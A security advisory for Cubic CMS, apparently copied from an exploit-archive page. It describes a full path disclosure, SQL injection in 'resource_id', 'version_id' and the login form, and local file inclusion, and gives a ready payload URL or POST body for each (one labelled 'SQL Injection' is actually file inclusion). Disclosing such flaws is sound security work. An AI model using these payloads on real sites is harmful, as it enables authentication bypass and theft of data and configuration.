扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
I. BACKGROUND ------------------------- "CUBIC CMS" is a non-free content management system for websites and portals of any size, powerful, adaptable to any graphic design that allows users administration 100% professional but simple at the same time that website. II. VULNERABILITIES ------------------------- II.i FULL PATH DISCLOSURE ------------------------- CUBIC CMS presents a full path disclosure in the 'Controller Not Found' exception management, due to an incorrect 'Software Exception' management. Syntax: http://www.example.com/id/-22 http://www.example.com/foo.bar II.ii SQL Injection ------------------------- CUBIC CMS presents a SQL Injection in its 'resource_id' and 'version_id' parameters on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP Method, due to an insufficient sanitization on user supplied data. Syntax: http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- - http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- - II.iii SQL Injection ------------------------- CUBIC CMS presents a SQL Injection in its 'login' and 'pass' parameters on his '/login.usuario' (Users Management Module) script via POST HTTP Method, due to an insufficient sanitization on user supplied data. Syntax: login=Administrator&pass=foobar') or ('1'='1 II.iv Local File Inclusion ------------------------- CUBIC CMS presents a SQL Injection in its 'path' parameter on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP Method, due to an insufficient sanitization on user supplied data. Syntax: http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini IV. REFERENCES ------------------------- http://www.proyectosbds.com <blockquote class="wp-embedded-content" data-secret="hsaYZdrqOn"><a href="https://www.cubicfactory.com/" target="_blank"rel="external nofollow" class="external" >Inicio diseño web</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="«Inicio diseño web» — Cubic Factory" src="https://www.cubicfactory.com/embed/#?secret=KUqNjbzRgb#?secret=hsaYZdrqOn" data-secret="hsaYZdrqOn" frameborder="0" marginmarginscrolling="no"></iframe> V. DISCLOSURE TIMELINE ------------------------- - March 28, 2012: First Vendor Contact. - Dec 30, 2013: Second Vendor Contact (Still waiting for responses). VI. CREDITS ------------------------- This vulnerability has been discovered by Eugenio Delfa <ed (at) isbox (dot) org>. |
体验盒子
